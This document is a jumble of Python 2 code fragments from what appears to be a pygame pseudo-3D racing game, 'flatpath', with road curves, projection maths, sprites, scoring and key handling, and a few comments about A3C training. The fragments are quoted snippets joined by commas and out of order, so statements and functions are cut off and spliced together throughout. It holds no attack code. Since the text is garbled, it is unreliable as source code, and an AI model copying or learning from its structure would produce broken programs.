self.xp_to_xs(xpr3, self.w) xpr4", "/ 2 - self.player_x #xc4 = -self.road_w / 2 -", "(float(n)+enter+hold)/total)) def add_curves(self): self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],", "= cfg self.bg_sky1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY']) self.bg_sky1.rect.top = 0 self.bg_sky1.rect.left", "not sprts: return # NOTE: we now only use the", "== self.pglc.K_LEFT: return 3 else: return None def key_to_di_b(self, k):", "self.player_di == 3: # < self.player_x -= 9 if self.player_x", "100 self.disp_add(self.lb1) ''' def handle_event(self, events, *args, **kwargs): return events", "= [0, i * d, self.size[0], d] #ca = 255", "(xsr2 + xsl2) / 2.0, xsl1, xsl2] #x_sprt = xsr1", "or ROAD['HILL']['LOW'] self.add_road(num, num, num, 0, height/2.0) self.add_road(num, num, num,", "looped seg_scale = self.geo_prjc_scale(self.d, zc1) x_rnd = random.randint(1, self.road_w /", "= 0 self.disp_add(self.road) self.disp_add(self.car) self.rdmap = FPSptRoadMap((480, 480), self.road.rd_get_segs(whole=True), self.road.seg_len)", "'x': 5, 'y': 5, 'w': 1280, 'h': 480 }, 'SKY':", "FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees2.rect.top = 0 self.bg_trees2.rect.left = self.bg_trees1.rect.width self.disp_add(self.bg_trees2) self.car", "= random.randint(2, 6) # for a3c train self.rd_seg_init_rand(segnrand) # for", "self.player_x < -self.road_w / 2 or \\ self.player_x > self.road_w", "'y': 5, 'w': 1280, 'h': 480 }, 'SKY': { 'x':", "0.0 self.add_road(enter, hold, leave, curve, yw) def rd_seg_init_rand_2(self, n=50): for", "if hill.rect.left - hill.rect.width > 0: hill.rect.left -= hill.rect.width *", "2 class FPSptRoadMap(sptdraw.SptDrawBase): def __init__(self, size, segs, rad, *args, **kwargs):", "a = float(curve) / rad a *= 10.0 #print a", "n=None): seg_n = len(self.segments) if n is None: #n =", "di = self.key_to_di_b(event.key) if di is not None: e_keys_up.append(di) else:", "1) # NOTE: not used now !! ##x_i = 2", "0, ys1, self.w, ys2, self.w, ys4, 0, ys3, seg['color']['grass']) self.render_polygon(None,", "-= self.sky_speed if sky.rect.left + sky.rect.width < 0: sky.rect.left +=", "p < 0.35: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['MEDIUM']) elif", "def __init__(self, img_file, *args, **kwargs): super(FPSptRdSprts, self).__init__(img_file) @classmethod def create_by_img(cls,", "obj = FPSptRdSprts.create_by_img(img) # avoid: pygame.error: Width or height is", "= zw1 - self.camera_z - (self.position % self.seg_len) zc2 =", "class FPSceneA(pygm.PyGMScene): def __init__(self, *args, **kwargs): super(FPSceneA, self).__init__(*args, **kwargs) self.straight", "rd_seg_render(self): \"\"\"curve\"\"\" #theta_i = math.pi /180.0 * 0.1 #theta_i =", "['img_sprts/i_heart.png'], 'score': 50,}, 'pot1': {'imgs': ['img_sprts/i_pot1.png'], 'score': -5,}, 'pot2': {'imgs':", "sprt_at = -40 elif x_i == 2: sprt_at = 580", "v in seg.items(): if k not in ['sprites']: seg_c[k] =", "#### # def geo_prjc_scale(self, d, zc): if zc == 0.0:", "self.score -= 1 #self.score -= 1 #if self.score < 0:", "# yw = random.random() * 10.0 else: curve = rl", "0.0 rad_m = 4.0#2.0#1.0# cv_s = 0 cv_l = 0.0", "+ (accel * dt) def util_increase(self, start, increment, mx): #", "def draw_segs(self, segs, rad): pnts = self.get_segs_pnts(segs, rad) #print pnts", "*args, **kwargs): self.check_player_di(self.e_keys_dn, self.e_keys_up) self.draw_on() self.rd_seg_render() self.update_world() self.check_if_car_out_road() self.check_score() self.check_tm()", "= FP_COLORS['LIGHT'] #c = {'road': FP_COLOR_WHITE} else: c = FP_COLORS['DARK']", "#xp = 2 ** 64 xp = xc else: xp", "None: di = self.key_to_di_b(event.key) if di is not None: e_keys_up.append(di)", "825, 'w': 80, 'h': 59 }, 'CAR04': { 'x': 1383,", "super(FPSptRdSprts, self).__init__(img_file) @classmethod def create_by_img(cls, img): return cls(img) # for", "yc = self.camera_h #print '=' * 80 #print 'self.position', self.position", "i, seg in enumerate(self.segments): zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z']", "- self.camera_z - (self.position % self.seg_len) ''' #x# zw1 =", "random.randint(10, 40) leave = random.randint(10, 40) if p < 0.3:", "self.player_x #xc3 = self.road_w / 2 - self.player_x #xc4 =", "self.camera_z) #zc2 = self.position - (zw2 - self.camera_z) xp1 =", "= self.rd_sprts_render(seg, x_pos, x_i, y_sprt, scale_sprt) if obj: self.rd_sprt_cache.append(obj) #", "3: #self.player_x -= self.player_x_dt self.player_x -= self.speed / 5 +", "+= sky.rect.width * 2 if sky.rect.left - sky.rect.width > 0:", "{}}, 'curve': curve, 'color': c, 'sprites': [], 'looped': 0, }", "y_sprt = ys1 scale_sprt = seg_scale * 8.0#10.0#2.0 obj =", "240 self.fog.rect.left = 0 self.disp_add(self.fog) def get_seg_base_i(self, pos=None): if pos", "i) ca = 200 / n * (n - i)", "- self.road_w / 2 yc = self.camera_h print '=' *", "#xc4 = -self.road_w / 2 - self.player_x - curve_d *", "''' #x# zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1 =", "p < 0.3: curve = 0.0 yw = 0.0 #elif", "down to up self.pygm.draw.rect(self.surf, self.c_prog, [1, self.size[1] - y, self.size[0]", "0.0) def rd_seg_init_rand(self, n=50): #print 'rd_seg_init_rand', n for i in", "font_size=12) self.rdpsd.rect.top = 456 self.rdpsd.rect.left = 312 self.disp_add(self.rdpsd) self.scr =", "0:^ 1:> 2:v 3:< self.player_go = 0 # 0:- 1:^", "(result < 0): result += mx return result def util_ease_in(self,", "'y': 644, 'w': 100, 'h': 78 }, 'CAR03': { 'x':", "= 0.0, 0.0 tht = 0.0 rad_m = 4.0#2.0#1.0# cv_s", "r_events.append(event) return r_events def refresh(self, fps_clock, *args, **kwargs): self.rdpsd.lbl_set(str(int(self.road.speed))) self.scr.lbl_set(str(int(self.road.score)))", "k == self.pglc.K_DOWN: return 2 elif k == self.pglc.K_LEFT: return", "-self.road_w / 2 - self.player_x yc = self.camera_h print '='", "in self.bg_trees: trees.rect.left += int(self.tree_speed * p_dt) if trees.rect.left +", "yc else: yp = yc * (d / zc) return", "seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1 = zw1 - self.camera_z -", "#print 'scale <2>', scale pass x_i_saved = info.get('x_i') #if not", "#rd_w_half = self.road_w / 2 #x_pos = [rd_w_half + self.lane_w,", "= self.seg_len * math.tan(theta1) dx2 = self.seg_len * math.tan(theta2) xs1", "0: # pnts.append(pnts[0]) cpnts = [self.xy_to_cntr(p[0], p[1]) for p in", "self.player_x > self.road_w / 2: if self.score > 0: self.score", "== 1: xpl1 = self.xc_to_xp(xcl1, self.d, zc1) xsl1 = self.xp_to_xs(xpl1,", "self.speed / 5 + 20 elif self.player_di == 3: #self.player_x", "def xc_to_xp(self, xc, d, zc): if zc == 0.0: #xp", "= self.xp_to_xs(xp4, self.w) yp1 = self.yc_to_yp(yc, self.d, zc1) ys1 =", "* SPACE : hide/show road map * TAB : replay", "190 }, 'BILLBOARD07': { 'x': 313, 'y': 897, 'w': 298,", "'screen': {}}, 'p2': {'world': {'z': (n + 2) * self.seg_len,", "= len(self.segments) segbi = self.get_seg_base_i() #print 'segbi', segbi, ' /", "self.render_polygon(None, xsr1, ys1, xsr2, ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble'])", "* (d / zc) return xp def yc_to_yp(self, yc, d,", "now !! ##x_i = 2 y_sprt = ys1 scale_sprt =", "IMG_POS_BACKGROUND['SKY']) self.bg_sky1.rect.top = 0 self.bg_sky1.rect.left = 0 self.disp_add(self.bg_sky1) self.bg_sky2 =", "= [] self.camera_x = 0.0 self.camera_y = 0.0 self.camera_z =", "1: self.speed += self.speed_dt_up elif self.player_go == 2: self.speed -=", "None: pos = self.position i = int(pos / self.seg_len) #x#i", "pass p_curve = self.player_seg.get('curve', 0.0) #print 'p_curve', p_curve p_dt =", "curve_d * i # <3> xx1 = rad1 * math.cos(engi", "self.player_seg.get('curve', 0.0) #print 'p_curve', p_curve p_dt = self.speed * p_curve", "self.player_x xcr2 = -self.lane_w - self.player_x xcr3 = self.lane_w -", "xc4 = -self.road_w / 2 - self.player_x xcl1 = xc1", "}, 'DEAD_TREE1': { 'x': 5, 'y': 555, 'w': 135, 'h':", "i < 10: print xs1, ys1, xs2, ys2 print xs4,", "xc2 = xc2 - x_curve xc3 = xc3 - x_curve", "segment just under the car self.player_di = 0 # 0:^", "self.yp_to_ys(yp3, self.h) ys4 = ys3 ''' # for test if", "200#150 self.seg_draw_n = 70#100#200#150 self.speed = 0.0 self.position = 0.0", "= 200#150 self.seg_draw_n = 70#100#200#150 self.speed = 0.0 self.position =", "'LONG': 100 }, # num segments 'CURVE': {'NONE': 0, 'EASY':", "= [] # <1> #for i, seg in enumerate(self.segments): #", "for event in events: #print event if event.type == self.pglc.KEYUP:", "h / 2.0 * yp ys = h / 2.0", "'h': 45 }, 'PLAYER_LEFT': { 'x': 995, 'y': 480, 'w':", "keep_segs: if not init: self.rd_sprts_del_all_objs() self.prms_reset(keep_segs=keep_segs) if segs_file is not", "di is None: di = self.key_to_di_b(event.key) if di is not", "self.add_road(num, num, num, 0, 0) self.add_road(num, num, num, 0, height/2.0)", "enumerate(sprts): sprt = info['name'] obj_k = str(seg['index']) + '_' +", "self.tree_speed = 0.3#0.15# def rd_reset(self, init=False, keep_segs=False, segs_file=None): #if not", "self.speed_dt_up = 1.0#2.0#3.0 self.speed_dt_dn = 2.0#4.0#6.0 self.speed_dt_na = 1.0#3.0 self.player_x_dt", "zc1) xsl2 = self.xp_to_xs(xpl2, self.w) xpl3 = self.xc_to_xp(xcl3, self.d, zc2)", "''' # for test if i < 10: print '>>>", "= seg.get('curve', 0.0) if curve == 0.0: rad_m = 1.0#0.1#", "xs3, ys3, seg['color']['road']) if 1:#i % 2 == 1: xpl1", "1: self.player_x += 19 if self.player_x > 1000: self.player_di =", "xc1 = (rad - xx1) - self.player_x xc2 = (rad", "/ 2 #obj.scale(scale) info['obj'] = obj ##self.disp_add(obj) # NOTE: render", "e_keys_up: if self.player_di != 3: self.player_di = 0 if 3", "FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['EASY']) else: enter = random.randint(10, 100)", "#return o class FPSptRoadB(sptdraw.SptDrawBase): def __init__(self, size, cfg, *args, **kwargs):", "self.player_x xc2 = -self.road_w / 2 - self.player_x xc3 =", "= self.xp_to_xs(xp2, self.w) xp3 = self.xc_to_xp(xc3, self.d, zc2) xs3 =", "480 }, } IMG_POS_SPRITES = { 'PALM_TREE': { 'x': 5,", "(random) x from x_pos 'x_i': random.randint(0, 4), 'score': FP_ROAD_SPRTS[sprt].get('score', 0),", "#print id(events) r_events = [] e_keys_up = [] e_keys_dn =", "= self.cv_to_engl(cv_l, rad) #tht += tht_d tht -= tht_d rad_m", "xcr2 = -self.lane_w - self.player_x xcr3 = self.lane_w - self.player_x", "for seg in segs: if not seg['sprites']: segs_c.append(seg) else: seg_c", "update_world(self): if self.player_go == 1: self.speed += self.speed_dt_up elif self.player_go", "2 if hill.rect.left - hill.rect.width > 0: hill.rect.left -= hill.rect.width", "dx1 xs3 += dx2 #+ dx1 xs4 += dx2 #+", "enter, hold, leave, curve, yw start_y = self.seg_lasy_y() end_y =", "self.camera_y = 0.0 self.camera_z = 500.0#1000.0#0.0 == self.camera_h self.xw =", "curve = 0.0 # yw = random.random() * 10.0 else:", "seg['p2']['world']['z'] ''' zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1 =", "- (zw1 - self.camera_z) #zc2 = self.position - (zw2 -", "y]) # from down to up self.pygm.draw.rect(self.surf, self.c_prog, [1, self.size[1]", "= self.xp_to_xs(xp3, self.w) xp4 = self.xc_to_xp(xc4, self.d, zc2) xs4 =", "if self.player_di != 1: self.player_di = 0 def update_world(self): if", "= 0 cv_l = 0.0 else: rad_m = 0.5#1.0#0.1# else:", "self.seg_n = 300#200 #self.seg_draw_n = 200#150 self.seg_draw_n = 70#100#200#150 self.speed", "['img_sprts/dinof2.png'], 'score': -50,}, 'blobb': {'imgs': ['img_sprts/blobb1.png'], 'score': -50,}, 'chick_fly': {'imgs':", "= -self.road_w / 2 - self.player_x yc = self.camera_h print", "util_accelerate(self, v, accel, dt): return v + (accel * dt)", "'x': 245, 'y': 1262, 'w': 215, 'h': 220 }, 'STUMP':", "road #self.road = FPSptRoad((640, 240), self.cfg) self.road = FPSptRoadB((640, 240),", "self.tm_start = 0.0 #self.tm_end = 0.0 def update_bg(self): # always", "2 - self.player_x yc = self.camera_h print '=' * 80", "float(curve) / rad #a *= 10.0 #print a s =", "def rd_seg_init_rand_2(self, n=50): for i in range(n): p = random.random()", "1 elif k == self.pglc.K_SPACE or k == self.pglc.K_v or", "'p2': {'world': {'z': (n + 2) * self.seg_len, 'y': yw},", "seg['color']['rumble']) def rd_seg_render__2_o(self): \"\"\"curve test 1\"\"\" #theta_i = math.pi /180.0", "for i in range(self.seg_draw_n): #''' # <2> si = (segbi", "super(FPSptFog, self).__init__(size) self.c = c self.h = h self.draw_on() def", "= utils.clr_from_str(FP_COLOR_BLUE) #self.pygm.draw.polygon(self.surf, c, cpnts) self.pygm.draw.lines(self.surf, c, False, cpnts, 3)", "looping result = start + increment while (result >= mx):", "under the car self.player_di = 0 # 0:^ 1:> 2:v", "obj.rect.left = x_pos[x_i_saved] - obj.rect.width / 2 #obj.scale(scale) info['obj'] =", "p_curve p_dt = self.speed * p_curve * self.centrifugal #print p_dt", "#print n if n % 2 == 0: #if n", "- x_curve xc2 = xc2 - x_curve xc3 = xc3", "* 80 #print 'self.position', self.position for i, seg in enumerate(self.segments):", "2: sprt_at = 580 elif x_i == 3: sprt_at =", "xc2 + self.lane_w #xcl3 = xc3 - self.lane_w #xcl4 =", "= 0.0 self.player_x = 0.0#100.0#1000.0# self.centrifugal = 0.1#0.06#0.08#0.01#0.3 self.player_seg =", "'w': 80, 'h': 45 }, 'PLAYER_UPHILL_STRAIGHT': { 'x': 1295, 'y':", "* i #xc3 = self.road_w / 2 - self.player_x -", "def rd_reset(self, init=False, keep_segs=False, segs_file=None): #if not init and not", "self.bg_trees2]) self.road.rect.top = 240 self.road.rect.left = 0 self.disp_add(self.road) self.disp_add(self.car) self.rdmap", "ys1, self.w, ys2, self.w, ys4, 0, ys3, seg['color']['grass']) # road", "self.pglc.K_RETURN: self.road_reset() elif k == self.pglc.K_TAB: self.road_reset_keep_segs() elif k ==", "2 - self.player_x - curve_d * i xp1 = self.xc_to_xp(xc1,", "self.bk.rect.top = -230 self.bk.rect.left = -230 #self.disp_add(self.bk) self.scn1 = FPSceneA()", "20, 'MEDIUM': 40, 'HIGH': 60 }, } FP_ROAD_SPRTS = {", "math.cos(engi * (i + 1)) xc1 = (rad - xx1)", "'x': 230, 'y': 5, 'w': 385, 'h': 265 }, 'TREE1':", "self.game_over = True self.game_score = 1.0 if self.player_di == 1:", "20 else: pass p_curve = self.player_seg.get('curve', 0.0) #print 'p_curve', p_curve", "self.add_road(num, num, num, 0, height/2.0) self.add_road(num, num, num, 0, -height)", "-= p_dt self.player_x += p_dt def check_if_car_out_road(self): # decrease score", "{'imgs': ['img_sprts/i_coin1.png'], 'score': 1,}, 'coin5': {'imgs': ['img_sprts/i_coin5.png'], 'score': 5,}, 'coin20':", "= self.car.rect.width * 2 sprt_at = 10000 if x_i ==", "range(enter): self.rd_seg_add(self.util_ease_in(0, curve, float(n)/enter), self.util_ease_out(start_y, end_y, float(n)/total)) for n in", "math.sin(tht) pnts.append([x, y]) #print pnts return pnts def draw_segs(self, segs,", "< self.seg_draw_n / 4: theta1 = theta_i * i theta2", "1383, 'y': 894, 'w': 80, 'h': 57 }, 'CAR01': {", "dx2 #+ dx1 xs4 += dx2 #+ dx1 #''' self.render_polygon(None,", "#print si seg = self.segments[si] #''' ''' #x# if seg['index']", "rl * random.random() * 6.0 yw = 0.0 self.add_road(enter, hold,", "obj.rect.height obj.rect.left = x_pos[x_i_saved] - obj.rect.width / 2 #obj.scale(scale) info['obj']", "- h / 2.0 * yp ys = h /", "self.road_w / 2 #x_pos = [rd_w_half + self.lane_w, # rd_w_half", "self.speed_dt_dn = 2.0#4.0#6.0 self.speed_dt_na = 1.0#3.0 self.player_x_dt = 60.0#30.0#20.0 self.last_seg_i", "if len(pnts) <= 1: return #if len(pnts) > 0: #", "{'imgs': ['img_sprts/blobb1.png'], 'score': -50,}, 'chick_fly': {'imgs': ['img_sprts/chick_fly3.png'], 'score': 70,}, 'clown':", "util_ease_in_out(self, a, b, percent): return a + (b - a)", "return r_events def refresh__1(self, fps_clock, *args, **kwargs): #print '>>> refresh'", "segment just under the car #sprts = self.player_seg['sprites'] sprts =", "= time.time() self.tm_last_once = self.tm_end - self.tm_start else: self.tm_start =", "y += rad_m * math.sin(tht) pnts.append([x, y]) #print pnts return", "c_prog=consts.GREEN) self.spd.rect.top = 70#340 self.spd.rect.left = 602 #self.spd.rotate(180) self.disp_add(self.spd) def", "= 580 elif x_i == 3: sprt_at = -580 elif", "x_i is None: return scr = sprt.get('score') if not scr:", "6.0 yw = 0.0 self.add_road(enter, hold, leave, curve, yw) def", "zc1 = zw1 - self.camera_z - self.position zc2 = zw2", "super(FPSptSprts, self).__init__(img_file, pos) class FPSptFog(sptdraw.SptDrawBase): def __init__(self, size, c=[0, 81,", "else: return None def key_to_di_b(self, k): if k == self.pglc.K_f", "xcr4 - x_curve - dx_curve x_curve = x_curve + dx_curve", "= xc else: xp = xc * (d / zc)", "self.fill(self.c_bg) #self.pygm.draw.rect(self.surf, consts.GREEN, # [1, 0, self.size[0] - 2, y])", "0, height/2.0) self.add_road(num, num, num, 0, 0) def rd_seg_get_cleared(self, segs=None):", "100) hold = random.randint(10, 100) leave = random.randint(10, 100) self.add_road(enter,", "draw #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 self.rd_seg_init(10) # for a3c train self.rd_start_seg_init() self.rd_sprts_init_rand()", "0: trees.rect.left -= trees.rect.width * 2 class FPSptRoadMap(sptdraw.SptDrawBase): def __init__(self,", "k == self.pglc.K_BACKSPACE: self.road_reset_from_file() elif k == self.pglc.K_SLASH: self.road_segs_to_file() else:", "xsl4, ys4, xs4, ys4, seg['color']['rumble']) xpr1 = self.xc_to_xp(xcr1, self.d, zc1)", "+ (b - a) * ((-math.cos(percent * math.pi)/2) + 0.5)", "self.d, zc1) xs1 = self.xp_to_xs(xp1, self.w) xp2 = self.xc_to_xp(xc2, self.d,", "-50,}, 'blobb': {'imgs': ['img_sprts/blobb1.png'], 'score': -50,}, 'chick_fly': {'imgs': ['img_sprts/chick_fly3.png'], 'score':", "range(a): self.rd_seg_add(0.0, 0.0) def rd_seg_add(self, curve=0.0, yw=0.0): #print '+', curve,", "self.cfg, car=self.car, bg_sky=[self.bg_sky1, self.bg_sky2], bg_hills=[self.bg_hills1, self.bg_hills2], bg_trees=[self.bg_trees1, self.bg_trees2]) self.road.rect.top =", "self.road.rect.left = 0 self.disp_add(self.road) self.disp_add(self.car) self.rdmap = FPSptRoadMap((480, 480), self.road.rd_get_segs(whole=True),", "start + increment while (result >= mx): result -= mx", "def render_polygon(self, ctx, x1, y1, x2, y2, x3, y3, x4,", "2 in e_keys_up: if self.player_go != 1: self.player_go = 0", "curve == 0.0: rad_m = 1.0#0.1# else: a = float(curve)", "or 0 return #rd_w_half = self.road_w / 2 #x_pos =", "pnts = [[x1, d-y1], [x2, d-y2], [x3, d-y3], [x4, d-y4],", "FPSptRoadB(sptdraw.SptDrawBase): def __init__(self, size, cfg, *args, **kwargs): super(FPSptRoadB, self).__init__(size) self.cfg", "self.position # for curve xc1 = xc1 - x_curve xc2", "x_curve - dx_curve x_curve = x_curve + dx_curve dx_curve =", "2 - self.player_x # <3> #engi = math.pi / 2.0", "ys4, xs4, ys4, seg['color']['rumble']) xpr1 = self.xc_to_xp(xcr1, self.d, zc1) xsr1", "#a *= 10.0 #print a s = 1.0 if a", "480) sf = GMFlatpath('flatpath <:::>', 640, 480, road_file='sr_road.txt') sf.mainloop() if", "0.0 self.add_road(enter, hold, leave, curve, yw) def rd_start_seg_init(self, n=3): seg_n", "self.car.scale(2) self.car.rect.top = 400 self.car.rect.left = (640 - self.car.rect.width) /", "* ((-math.cos(percent * math.pi)/2) + 0.5) def util_curve_percent_remaining(self, n, total):", "= yc else: yp = yc * (d / zc)", "= 0.0 self.position = 0.0 self.player_x = 0.0#100.0#1000.0# self.centrifugal =", "#''' #if 1: #if i < self.seg_draw_n / 2: if", "ys3, seg['color']['grass']) self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4, xs3,", "[] e_keys_up = [] e_keys_dn = [] for event in", "events r_events = [] for event in events: #print event", "# <3> #engi = math.pi / 2.0 / self.seg_draw_n engi", "'x': 1383, 'y': 760, 'w': 88, 'h': 55 }, 'CAR02':", "2.0 + w / 2.0 * xp xs = w", "298, 'h': 140 }, 'TREE2': { 'x': 1205, 'y': 5,", "'scale <1>', scale pass else: try: obj.scale(scale) except: #print 'scale", "240 - obj.rect.height obj.rect.left = x_pos[x_i_saved] - obj.rect.width / 2", "-self.lane_w - self.player_x xcr3 = self.lane_w - self.player_x xcr4 =", "car #sprts = self.player_seg['sprites'] sprts = self.base_seg['sprites'] if not sprts:", "self.spd.rect.top = 70#340 self.spd.rect.left = 602 #self.spd.rotate(180) self.disp_add(self.spd) def rdmap_hide(self):", "200)) self.sn1.rect.top = 100 self.sn1.rect.left = 100 self.disp_add(self.sn1) ''' '''", "# for reset to delete all # NOTE: only show", "util_increase(self, start, increment, mx): # with looping result = start", "1097, 'w': 240, 'h': 155 }, 'CACTUS': { 'x': 929,", "self.position += self.speed if self.position > self.track_len: self.position -= self.track_len", "rad_m = 4.0#2.0#1.0# cv_s = 0 cv_l = 0.0 pnts.append([x,", "init and not keep_segs: if not init: self.rd_sprts_del_all_objs() self.prms_reset(keep_segs=keep_segs) if", "real (random) x from x_pos 'x_i': random.randint(0, 4), 'score': FP_ROAD_SPRTS[sprt].get('score',", "c=consts.GREEN, font_size=12) self.rdpsd.rect.top = 456 self.rdpsd.rect.left = 312 self.disp_add(self.rdpsd) self.scr", "e_keys_dn: self.player_go = 2 if 1 in e_keys_dn: self.player_di =", "= 1.0 if self.player_di == 1: #self.player_x += self.player_x_dt self.player_x", "#xcl4 = xc4 + self.lane_w xcr1 = self.lane_w - self.player_x", "cv_s = 1 continue x += rad_m * math.cos(tht) y", "xs2) / 2.0 #y_sprt = (ys1 + ys3) / 2.0", "80, 'h': 41 }, 'PLAYER_STRAIGHT': { 'x': 1085, 'y': 480,", "FP_COLOR_WHITE = '#FFFFFF' FP_COLOR_BLACK = '#000000' FP_COLOR_YELLOW = '#EEEE00' FP_COLOR_BLUE", "240), self.cfg) self.road = FPSptRoadB((640, 240), self.cfg, car=self.car, bg_sky=[self.bg_sky1, self.bg_sky2],", "= 0.0 self.d = 200.0#100.0#10.0#30.0#1.0 self.w = self.size[0] self.h =", "0, 0) def rd_seg_get_cleared(self, segs=None): if not segs: segs =", "zc2) xs4 = self.xp_to_xs(xp4, self.w) yp1 = self.yc_to_yp(yc, self.d, zc1)", "if on the grass, slow down if self.player_x < -self.road_w", "FP_COLOR_WHITE, 'rumble': FP_COLOR_WHITE}, 'FINISH': {'road': FP_COLOR_BLACK, 'grass': FP_COLOR_BLACK, 'rumble': FP_COLOR_BLACK},", "'BILLBOARD01': { 'x': 625, 'y': 375, 'w': 300, 'h': 170", "math.asin(a) # TODO: tht += tht_d rad_m = 10.0#50.0# x", "self.pglc.K_SLASH: self.road_segs_to_file() else: r_events.append(event) elif event.type == self.pglc.KEYDOWN: r_events.append(event) else:", "'h': 59 }, 'CAR04': { 'x': 1383, 'y': 894, 'w':", "c, 'sprites': [], 'looped': 0, } self.segments.append(seg) self.track_len = len(self.segments)", "/ zc) return xp def yc_to_yp(self, yc, d, zc): if", "sprt_at = -580 elif x_i == 4: sprt_at = 1100", "seg_lasy_y(self): seg_n = len(self.segments) if seg_n == 0: return 0.0", "the cloud #sky.rect.left -= self.sky_speed if sky.rect.left + sky.rect.width <", "'color': c, 'sprites': [], 'looped': 0, } self.segments.append(seg) self.track_len =", "= 60.0#30.0#20.0 self.last_seg_i = 0 self.score = 0 self.game_over =", "0 in e_keys_dn: self.player_go = 1 elif 2 in e_keys_dn:", "= self.key_to_di(event.key) if di is None: di = self.key_to_di_b(event.key) if", "self.sn1.rect.left = 100 self.disp_add(self.sn1) ''' ''' self.lb1 = pygm.SptLbl('hello,', c=consts.GREEN,", "= rad1 * math.cos(engi * (i + 1)) xx4 =", "0.0 xc1 = self.road_w / 2 - self.player_x xc2 =", "e: #print '-' * 60 pass def rd_sprts_render(self, seg, x_pos,", "= info.get('x_i') #if not x_i_saved: # info['x_i'] = x_i #", "self.w) xpl2 = self.xc_to_xp(xcl2, self.d, zc1) xsl2 = self.xp_to_xs(xpl2, self.w)", "/ 2 - self.player_x - curve_d * i #xc3 =", "150, 'y': 555, 'w': 328, 'h': 282 }, 'BOULDER3': {", "dx_curve dx_curve = dx_curve + seg.get('curve', 0.0) # for hills", "self.rd_sprts_init_rand() def draw_on(self, *args, **kwargs): self.fill(self.clr_dark_grass) def add_fog(self): self.fog =", "= self.yp_to_ys(yp3, self.h) ys4 = ys3 #''' #if 1: #if", "hold = random.randint(10, 40) leave = random.randint(10, 40) curve =", "int(utils.math_round(pos / self.seg_len)) #i = int(math.floor(pos / self.seg_len)) #i =", "0:- 1:^ 2:v self.speed_dt_up = 1.0#2.0#3.0 self.speed_dt_dn = 2.0#4.0#6.0 self.speed_dt_na", "= 240 self.fog.rect.left = 0 self.disp_add(self.fog) def get_seg_base_i(self, pos=None): if", "scale_sprt = seg_scale * 8.0#10.0#2.0 obj = self.rd_sprts_render(seg, x_pos, x_i,", "seg_n = len(self.segments) segbi = self.get_seg_base_i() print 'segbi', segbi #", "scale): sprts = seg.get('sprites') if not sprts: return None for", "s = utils.json_dumps(sc) with open(f, 'w') as fo: fo.write(s) def", "= self.yc_to_yp(yc, self.d, zc1) ys1 = self.yp_to_ys(yp1, self.h) ys2 =", "h / 2.0 - h / 2.0 * yp ys", "elif x_i == 2: sprt_at = 580 elif x_i ==", "class SptTmpi(pygm.SptImg): def __init__(self, img_file, *args, **kwargs): super(SptTmpi, self).__init__(img_file) class", "#self.rd_seg_init(self.seg_n) #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 #self.rd_seg_init(random.randint(30, 100)) self.rd_seg_init(random.randint(1, 10)) # for a3c", "= FPSptRoad((640, 240), self.cfg) self.road = FPSptRoadB((640, 240), self.cfg, car=self.car,", "def handle_event(self, events, *args, **kwargs): return events def refresh(self, fps_clock,", "b_curve #print 'world z', self.player_seg['p1']['world']['z'] #print 'world y', self.player_seg['p1']['world'].get('y', 0.0)", "len(self.segments) segbi = self.get_seg_base_i() print 'segbi', segbi self.player_seg = self.segments[segbi]", "'h': 140 }, 'SEMI': { 'x': 1365, 'y': 490, 'w':", "-5,}, 'pot2': {'imgs': ['img_sprts/i_pot2.png'], 'score': -1,}, 'shell': {'imgs': ['img_sprts/p_shell.png'], 'score':", "self.rdmap_hide() elif k == self.pglc.K_RETURN: self.road_reset() elif k == self.pglc.K_TAB:", ": hide/show road map * TAB : replay this road", "% 2 == 0: #if n % 4 == 0:", "= -self.lane_w - self.player_x yc = self.camera_h #print '=' *", "3:< self.player_go = 0 # 0:- 1:^ 2:v self.speed_dt_up =", "#print '>>> ', events if not self.flag_check_event: return events else:", "pnts.append([x, y]) #print pnts return pnts def draw_segs(self, segs, rad):", "xs2, ys2, xs4, ys4, xs3, ys3, seg['color']['road']) def rd_seg_render__3_o(self): \"\"\"curve", "'DARK': {'road': '#696969', 'grass': '#009A00', 'rumble': '#BBBBBB' }, 'START': {'road':", "{ 'x': 1205, 'y': 310, 'w': 268, 'h': 170 },", "#print pnts return pnts def get_segs_pnts_1(self, segs, rad): pnts =", "% seg_n #print si seg = self.segments[si] #''' ''' #", "'y': 1097, 'w': 240, 'h': 155 }, 'CACTUS': { 'x':", "<2> seg_n = len(self.segments) segbi = self.get_seg_base_i() print 'segbi', segbi", "self.player_go = 0 # 0:- 1:^ 2:v self.speed_dt_up = 1.0#2.0#3.0", "+ seg.get('curve', 0.0) xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 =", "0.1#0.06#0.08#0.01#0.3 self.player_seg = None self.base_seg = None # the segment", "+= curve else: cv_s = 1 continue x += rad_m", "- sky.rect.width > 0: sky.rect.left -= sky.rect.width * 2 if", "rd_sprts_del_all_objs() ##del self.rd_sprt_objs[obj_k] img = FP_ROAD_SPRTS[sprt]['imgs'][0] obj = FPSptRdSprts.create_by_img(img) #", "def yp_to_ys(self, yp, h): #ys = h / 2.0 -", "self.player_x += self.speed / 5 + 20 elif self.player_di ==", "self.disp_add(self.car) self.rdmap = FPSptRoadMap((480, 480), self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rect.top = 